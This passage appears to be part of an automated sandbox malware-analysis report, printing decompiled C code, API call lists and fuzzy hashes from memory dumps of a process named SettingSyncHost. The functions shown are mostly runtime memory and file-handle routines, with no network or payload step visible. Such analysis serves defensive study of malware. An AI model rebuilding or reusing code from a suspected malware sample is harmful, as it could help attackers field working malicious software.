                                                                                                                                      							_t156 = _t155 + 8;
                                                                                                                                      							__eflags = _v36 - 0xffffffff;
                                                                                                                                      							if(_v36 != 0xffffffff) {
                                                                                                                                      								_v260 = _v36;
                                                                                                                                      							} else {
                                                                                                                                      								_v260 = 0;
                                                                                                                                      							}
                                                                                                                                      							_t124 = _v24;
                                                                                                                                      							 *(_v24 + _v260 * 4) = _v12;
                                                                                                                                      							_t157 = _t156 - 8;
                                                                                                                                      							_t171 =  *0x3bbc50;
                                                                                                                                      							 *_t157 = _t171;
                                                                                                                                      							E00393700(_v24);
                                                                                                                                      							 *_t157 = _t171;
                                                                                                                                      							E003935B0(_t124);
                                                                                                                                      							 *_t157 = _t171;
                                                                                                                                      							E00393460(_t124);
                                                                                                                                      							 *_t157 = _t171;
                                                                                                                                      							E00393340();
                                                                                                                                      							st0 = _t171;
                                                                                                                                      							_t152 = _t157 + 8;
                                                                                                                                      							_t88 = _v24;
                                                                                                                                      							 *[fs:0x2c] = _v24;
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				return E003931A1(_t88, _t133 - _t152 + 0x100);
                                                                                                                                      			}















































                                                                                                                                      0x00391d5f
                                                                                                                                      0x00391d65
                                                                                                                                      0x00391d68
                                                                                                                                      0x00391d6d
                                                                                                                                      0x00391d70
                                                                                                                                      0x00391d75
                                                                                                                                      0x00391d78
                                                                                                                                      0x00391d7d
                                                                                                                                      0x00391d80
                                                                                                                                      0x00391d85
                                                                                                                                      0x00391d87
                                                                                                                                      0x00391d92
                                                                                                                                      0x00391d98
                                                                                                                                      0x00391da0
                                                                                                                                      0x00391da6
                                                                                                                                      0x00391da8
                                                                                                                                      0x00391dad
                                                                                                                                      0x00391db0
                                                                                                                                      0x00391db6
                                                                                                                                      0x00391db9
                                                                                                                                      0x00391dbe
                                                                                                                                      0x00391dc1
                                                                                                                                      0x00391dc6
                                                                                                                                      0x00391dc9
                                                                                                                                      0x00391dce
                                                                                                                                      0x00391dd1
                                                                                                                                      0x00391dd6
                                                                                                                                      0x00391dd8
                                                                                                                                      0x00391deb
                                                                                                                                      0x00391df1
                                                                                                                                      0x00391df8
                                                                                                                                      0x00391dfb
                                                                                                                                      0x00391dfe
                                                                                                                                      0x00391e04
                                                                                                                                      0x00391e07
                                                                                                                                      0x00391e0c
                                                                                                                                      0x00391e0f
                                                                                                                                      0x00391e14
                                                                                                                                      0x00391e17
                                                                                                                                      0x00391e1c
                                                                                                                                      0x00391e1f
                                                                                                                                      0x00391e24
                                                                                                                                      0x00391e26
                                                                                                                                      0x00391e29
                                                                                                                                      0x00391e2d
                                                                                                                                      0x00391e34
                                                                                                                                      0x00391e37
                                                                                                                                      0x00391e3d
                                                                                                                                      0x00391e40
                                                                                                                                      0x00391e45
                                                                                                                                      0x00391e48
                                                                                                                                      0x00391e4d
                                                                                                                                      0x00391e50
                                                                                                                                      0x00391e55
                                                                                                                                      0x00391e58
                                                                                                                                      0x00391e5d
                                                                                                                                      0x00391e62
                                                                                                                                      0x00391e68
                                                                                                                                      0x00391e6a
                                                                                                                                      0x00391e6d
                                                                                                                                      0x00391e70
                                                                                                                                      0x00391e76
                                                                                                                                      0x00391e79
                                                                                                                                      0x00391e7e
                                                                                                                                      0x00391e81
                                                                                                                                      0x00391e86
                                                                                                                                      0x00391e89
                                                                                                                                      0x00391e8e
                                                                                                                                      0x00391e91
                                                                                                                                      0x00391e96
                                                                                                                                      0x00391e98
                                                                                                                                      0x00391e9b
                                                                                                                                      0x00391e9f
                                                                                                                                      0x00391eb0
                                                                                                                                      0x00391ea1
                                                                                                                                      0x00391ea1
                                                                                                                                      0x00391ea1
                                                                                                                                      0x00391ebc
                                                                                                                                      0x00391ec2
                                                                                                                                      0x00391ec5
                                                                                                                                      0x00391ec8
                                                                                                                                      0x00391ece
                                                                                                                                      0x00391ed1
                                                                                                                                      0x00391ed6
                                                                                                                                      0x00391ed9
                                                                                                                                      0x00391ede
                                                                                                                                      0x00391ee1
                                                                                                                                      0x00391ee6
                                                                                                                                      0x00391ee9
                                                                                                                                      0x00391eee
                                                                                                                                      0x00391ef0
                                                                                                                                      0x00391ef3
                                                                                                                                      0x00391ef6
                                                                                                                                      0x00391ef6
                                                                                                                                      0x00391e2d
                                                                                                                                      0x00391d09
                                                                                                                                      0x00391f0f

                                                                                                                                      APIs
                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00391CC7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                      • Opcode ID: fc8a0a5c2f8a6054c415fd6d6f5c0f77b7745f74db55b6bf7dd844f0c171f49a
                                                                                                                                      • Instruction ID: 2521e125eb41a215d271b9e743bb49becb72724417120ea06f47e574675f5378
                                                                                                                                      • Opcode Fuzzy Hash: fc8a0a5c2f8a6054c415fd6d6f5c0f77b7745f74db55b6bf7dd844f0c171f49a
                                                                                                                                      • Instruction Fuzzy Hash: CD8131B0908509DBCF06BF68E88A5ACFFB0FF48755F1149A4F4C45A2A1DF314A68C75A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 003EF76E
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 003EF834
                                                                                                                                      • __freea.LIBCMT ref: 003EF8A0
                                                                                                                                        • Part of subcall function 003E5CF9: RtlAllocateHeap.NTDLL(00000000,?,?,?,003DB376,?,?,?,00000000,?,003CB0A7,?,?,?), ref: 003E5D2B
                                                                                                                                      • __freea.LIBCMT ref: 003EF8A9
                                                                                                                                      • __freea.LIBCMT ref: 003EF8CC
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1423051803-0
                                                                                                                                      • Opcode ID: b4096b3a7d7b79fc456e4abfadbfb53a8b35114642d473ea2390d7fd3be76d62
                                                                                                                                      • Instruction ID: 8d8595329de8d5eca9a3cdaa83a89d7bda359e7405ad1b20191c657336052bc4
                                                                                                                                      • Opcode Fuzzy Hash: b4096b3a7d7b79fc456e4abfadbfb53a8b35114642d473ea2390d7fd3be76d62
                                                                                                                                      • Instruction Fuzzy Hash: D251B4725006A6AFEF265E569C41EBB37A9EF44750F160339F908AB280E7B0DD108660
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5CF9: RtlAllocateHeap.NTDLL(00000000,?,?,?,003DB376,?,?,?,00000000,?,003CB0A7,?,?,?), ref: 003E5D2B
                                                                                                                                      • _free.LIBCMT ref: 003E29E7
                                                                                                                                      • _free.LIBCMT ref: 003E29FE
                                                                                                                                      • _free.LIBCMT ref: 003E2A1B
                                                                                                                                      • _free.LIBCMT ref: 003E2A36
                                                                                                                                      • _free.LIBCMT ref: 003E2A4D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3033488037-0
                                                                                                                                      • Opcode ID: 443f79d4449b1d4d812d70fef5774dabe1e83769fc5d7c12c35bdf9dc912c655
                                                                                                                                      • Instruction ID: e5a250722f00fb3d5b104255ce84f63855d8d9ff0e1cf94a7dc9431cfdafe729
                                                                                                                                      • Opcode Fuzzy Hash: 443f79d4449b1d4d812d70fef5774dabe1e83769fc5d7c12c35bdf9dc912c655
                                                                                                                                      • Instruction Fuzzy Hash: 0351C572A007549FDB22DF2ACC41A6BB7F8EF58724F154669E805DB2D1E731E901CB50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003D3936
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003D3956
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003D3976
                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 003D3A11
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003D3A29
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 459529453-0
                                                                                                                                      • Opcode ID: 3a5148b6b2ce94c2f135b9023b4fc4c04c8cebed7ba1097c01e9243c0b4e9e13
                                                                                                                                      • Instruction ID: c0b342e4f91f0ca095b5fb36488668267ecc4c7ee10be2fafa12bb0f1535fd41
                                                                                                                                      • Opcode Fuzzy Hash: 3a5148b6b2ce94c2f135b9023b4fc4c04c8cebed7ba1097c01e9243c0b4e9e13
                                                                                                                                      • Instruction Fuzzy Hash: 7041B1B2A04215CFCB12DF94E991B6EB7B4FB04710F11416EE846AB381DB71AE05CB82
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                      			E0039F4AA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                      				long _t27;
                                                                                                                                      				signed int _t34;
                                                                                                                                      				signed int _t36;
                                                                                                                                      				signed char _t42;
                                                                                                                                      				intOrPtr* _t46;
                                                                                                                                      				void* _t49;
                                                                                                                                      				signed int _t56;
                                                                                                                                      				void* _t57;
                                                                                                                                      
                                                                                                                                      				_t55 = __esi;
                                                                                                                                      				_t49 = __edx;
                                                                                                                                      				_push(0xc);
                                                                                                                                      				_push(0x3c5f90);
                                                                                                                                      				E0039A560(__ebx, __edi, __esi);
                                                                                                                                      				 *(_t57 - 0x1c) = 0;
                                                                                                                                      				_t42 = 0;
                                                                                                                                      				if(( *(_t57 + 0xc) & 0x00000008) != 0) {
                                                                                                                                      					_t42 = 0x20;
                                                                                                                                      				}
                                                                                                                                      				if(( *(_t57 + 0xc) & 0x00004000) != 0) {
                                                                                                                                      					_t42 = _t42 | 0x00000080;
                                                                                                                                      				}
                                                                                                                                      				if(( *(_t57 + 0xc) & 0x00000080) != 0) {
                                                                                                                                      					_t42 = _t42 | 0x00000010;
                                                                                                                                      				}
                                                                                                                                      				_t27 = GetFileType( *(_t57 + 8));
                                                                                                                                      				if(_t27 != 0) {
                                                                                                                                      					__eflags = _t27 - 2;
                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                      						__eflags = _t27 - 3;
                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                      							_t42 = _t42 | 0x00000008;
                                                                                                                                      							__eflags = _t42;
                                                                                                                                      						}
                                                                                                                                      					} else {
                                                                                                                                      						_t42 = _t42 | 0x00000040;
                                                                                                                                      					}
                                                                                                                                      					_t56 = E0039F311(_t42, _t49, 0, _t55, __eflags);
                                                                                                                                      					 *(_t57 + 0xc) = _t56;
                                                                                                                                      					__eflags = _t56 - 0xffffffff;
                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                      						 *((intOrPtr*)(_t57 - 4)) = 0;
                                                                                                                                      						E0039F0DB(_t42, _t56,  *(_t57 + 8));
                                                                                                                                      						_t46 = 0x4ee8c0 + (_t56 >> 5) * 4;
                                                                                                                                      						_t34 = (_t56 & 0x0000001f) << 6;
                                                                                                                                      						 *( *_t46 + _t34 + 4) = _t42 | 0x00000001;
                                                                                                                                      						 *( *_t46 + _t34 + 0x24) =  *( *_t46 + _t34 + 0x24) & 0x00000080;
                                                                                                                                      						 *( *_t46 + _t34 + 0x24) =  *( *_t46 + _t34 + 0x24) & 0x0000007f;
                                                                                                                                      						 *(_t57 - 0x1c) = 1;
                                                                                                                                      						 *((intOrPtr*)(_t57 - 4)) = 0xfffffffe;
                                                                                                                                      						_t36 = E0039F598(0, _t56);
                                                                                                                                      						__eflags =  *(_t57 - 0x1c);
                                                                                                                                      						if( *(_t57 - 0x1c) == 0) {
                                                                                                                                      							goto L8;
                                                                                                                                      						}
                                                                                                                                      						_t37 = _t56;
                                                                                                                                      						goto L9;
                                                                                                                                      					} else {
                                                                                                                                      						 *((intOrPtr*)(E0039960F(__eflags))) = 0x18;
                                                                                                                                      						_t36 = E00399622(__eflags);
                                                                                                                                      						 *_t36 = 0;
                                                                                                                                      						goto L8;
                                                                                                                                      					}
                                                                                                                                      				} else {
                                                                                                                                      					_t36 = E00399635(GetLastError());
                                                                                                                                      					L8:
                                                                                                                                      					_t37 = _t36 | 0xffffffff;
                                                                                                                                      					L9:
                                                                                                                                      					return E0039A5A5(_t37);
                                                                                                                                      				}
                                                                                                                                      			}












                                                                                                                                      APIs
                                                                                                                                      • GetFileType.KERNEL32(?,?,?,003C5F90,0000000C), ref: 0039F4DE
                                                                                                                                      • GetLastError.KERNEL32(?,?,003C5F90,0000000C), ref: 0039F4E8
                                                                                                                                      • __dosmaperr.LIBCMT ref: 0039F4EF
                                                                                                                                      • __alloc_osfhnd.LIBCMT ref: 0039F510
                                                                                                                                      • __set_osfhnd.LIBCMT ref: 0039F53A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 43408053-0
                                                                                                                                      • Opcode ID: 555e7aeba54e9a99c0590e843207f085b292dab2c046b63d3d047f379d0b6aa4
                                                                                                                                      • Instruction ID: 0c7e4d0e2ac97770f8d852a20021e3bb5adb8eec1c100dd5d9e414a690376ceb
                                                                                                                                      • Opcode Fuzzy Hash: 555e7aeba54e9a99c0590e843207f085b292dab2c046b63d3d047f379d0b6aa4
                                                                                                                                      • Instruction Fuzzy Hash: AB2100316012059FDF13AF79C8057AE7B60AF42324F2A8269E4A8CF1D3DB788981DF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                      			E003A2A01(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
                                                                                                                                      				void* _t7;
                                                                                                                                      				long _t8;
                                                                                                                                      				intOrPtr* _t9;
                                                                                                                                      				intOrPtr* _t12;
                                                                                                                                      				long _t27;
                                                                                                                                      				long _t30;
                                                                                                                                      
                                                                                                                                      				if(_a4 != 0) {
                                                                                                                                      					_push(__esi);
                                                                                                                                      					_t30 = _a8;
                                                                                                                                      					__eflags = _t30;
                                                                                                                                      					if(_t30 != 0) {
                                                                                                                                      						_push(__edi);
                                                                                                                                      						while(1) {
                                                                                                                                      							__eflags = _t30 - 0xffffffe0;
                                                                                                                                      							if(_t30 > 0xffffffe0) {
                                                                                                                                      								break;
                                                                                                                                      							}
                                                                                                                                      							__eflags = _t30;
                                                                                                                                      							if(_t30 == 0) {
                                                                                                                                      								_t30 = _t30 + 1;
                                                                                                                                      								__eflags = _t30;
                                                                                                                                      							}
                                                                                                                                      							_t7 = HeapReAlloc( *0x4ee3c8, 0, _a4, _t30);
                                                                                                                                      							_t27 = _t7;
                                                                                                                                      							__eflags = _t27;
                                                                                                                                      							if(_t27 != 0) {
                                                                                                                                      								L17:
                                                                                                                                      								_t8 = _t27;
                                                                                                                                      							} else {
                                                                                                                                      								__eflags =  *0x4ee414 - _t7;
                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                      									_t9 = E0039960F(__eflags);
                                                                                                                                      									 *_t9 = E003995CD(GetLastError());
                                                                                                                                      									goto L17;
                                                                                                                                      								} else {
                                                                                                                                      									__eflags = E003ACA78(_t7, _t30);
                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                      										_t12 = E0039960F(__eflags);
                                                                                                                                      										 *_t12 = E003995CD(GetLastError());
                                                                                                                                      										L12:
                                                                                                                                      										_t8 = 0;
                                                                                                                                      										__eflags = 0;
                                                                                                                                      									} else {
                                                                                                                                      										continue;
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      							goto L14;
                                                                                                                                      						}
                                                                                                                                      						E003ACA78(_t6, _t30);
                                                                                                                                      						 *((intOrPtr*)(E0039960F(__eflags))) = 0xc;
                                                                                                                                      						goto L12;
                                                                                                                                      					} else {
                                                                                                                                      						E00399DFA(_a4);
                                                                                                                                      						_t8 = 0;
                                                                                                                                      					}
                                                                                                                                      					L14:
                                                                                                                                      					return _t8;
                                                                                                                                      				} else {
                                                                                                                                      					return E003A28EB(__edx, __edi, __esi, _a8);
                                                                                                                                      				}
                                                                                                                                      			}










                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 003A2A0F
                                                                                                                                        • Part of subcall function 003A28EB: __FF_MSGBANNER.LIBCMT ref: 003A2904
                                                                                                                                        • Part of subcall function 003A28EB: __NMSG_WRITE.LIBCMT ref: 003A290B
                                                                                                                                        • Part of subcall function 003A28EB: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0039A7CB,00000001,00000001,00000001,?,00399D52,00000018,003C5EC8,0000000C,00399DE2), ref: 003A2930
                                                                                                                                      • _free.LIBCMT ref: 003A2A22
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocHeap_free_malloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2734353464-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • _free.LIBCMT ref: 003EC969
                                                                                                                                        • Part of subcall function 003E5CBF: RtlFreeHeap.NTDLL(00000000,00000000,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7), ref: 003E5CD5
                                                                                                                                        • Part of subcall function 003E5CBF: GetLastError.KERNEL32(003CB0A7,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7,003CB0A7), ref: 003E5CE7
                                                                                                                                      • _free.LIBCMT ref: 003EC97B
                                                                                                                                      • _free.LIBCMT ref: 003EC98D
                                                                                                                                      • _free.LIBCMT ref: 003EC99F
                                                                                                                                      • _free.LIBCMT ref: 003EC9B1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                      			E00399554(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                      				signed int _t12;
                                                                                                                                      				void* _t28;
                                                                                                                                      				intOrPtr _t29;
                                                                                                                                      				void* _t30;
                                                                                                                                      				void* _t31;
                                                                                                                                      
                                                                                                                                      				_t31 = __eflags;
                                                                                                                                      				_t26 = __edi;
                                                                                                                                      				_t25 = __edx;
                                                                                                                                      				_t20 = __ebx;
                                                                                                                                      				_push(0xc);
                                                                                                                                      				_push(0x3c5e58);
                                                                                                                                      				E0039A560(__ebx, __edi, __esi);
                                                                                                                                      				_t28 = E003998D1(__ebx, __edx, _t31);
                                                                                                                                      				_t12 =  *0x3c72f4; // 0xfffffffe
                                                                                                                                      				if(( *(_t28 + 0x70) & _t12) == 0) {
                                                                                                                                      					L6:
                                                                                                                                      					E00399DC7(_t20, _t26, 0xc);
                                                                                                                                      					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                                                                                                                      					_t29 = _t28 + 0x6c;
                                                                                                                                      					 *((intOrPtr*)(_t30 - 0x1c)) = E00399507(_t29,  *0x3c72e8);
                                                                                                                                      					 *(_t30 - 4) = 0xfffffffe;
                                                                                                                                      					E003995C1();
                                                                                                                                      				} else {
                                                                                                                                      					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                                                      					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                                                      						goto L6;
                                                                                                                                      					} else {
                                                                                                                                      						_t29 =  *((intOrPtr*)(E003998D1(_t20, __edx, _t33) + 0x6c));
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				_t34 = _t29;
                                                                                                                                      				if(_t29 == 0) {
                                                                                                                                      					E003A235F(_t25, _t34, 0x20);
                                                                                                                                      				}
                                                                                                                                      				return E0039A5A5(_t29);
                                                                                                                                      			}









                                                                                                                                      APIs
                                                                                                                                      • __getptd.LIBCMT ref: 00399560
                                                                                                                                        • Part of subcall function 003998D1: __getptd_noexit.LIBCMT ref: 003998D4
                                                                                                                                        • Part of subcall function 003998D1: __amsg_exit.LIBCMT ref: 003998E1
                                                                                                                                      • __getptd.LIBCMT ref: 00399577
                                                                                                                                      • __amsg_exit.LIBCMT ref: 00399585
                                                                                                                                      • __lock.LIBCMT ref: 00399595
                                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 003995A9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 938513278-0
                                                                                                                                      • Opcode ID: 9e7326b8770c3678e10dd91c20859e17a378b95aa0b7e8437d31273c8a2771a0
                                                                                                                                      • Instruction ID: 78101413ea7236bacfec26459a6e697dc9ca189b0d726a60a730db0d0090f00b
                                                                                                                                      • Opcode Fuzzy Hash: 9e7326b8770c3678e10dd91c20859e17a378b95aa0b7e8437d31273c8a2771a0
                                                                                                                                      • Instruction Fuzzy Hash: 53F09033A086149AEF27BB6C9802B4E3294AF02720F13024EF858AE1D2DB6459418B56
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free
                                                                                                                                      • String ID: *?
                                                                                                                                      • API String ID: 269201875-2564092906
                                                                                                                                      • Opcode ID: b9e3bbee51c13a3c1a228606d860d739400fa8407438fed14ddebdd0105877bc
                                                                                                                                      • Instruction ID: cf0e50317c01a3cd72e83503dec571a736e6a695f0bc1cc84167fabd90475615
                                                                                                                                      • Opcode Fuzzy Hash: b9e3bbee51c13a3c1a228606d860d739400fa8407438fed14ddebdd0105877bc
                                                                                                                                      • Instruction Fuzzy Hash: 52617175D006299FCF15DFA9C8815EDFBF5EF48310B29826AE805F7340E631AE418B91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 003CBA5F
                                                                                                                                        • Part of subcall function 003DB5C4: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,?,003D9D7C,?,0040752C,?), ref: 003DB624
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionRaise___std_exception_copy
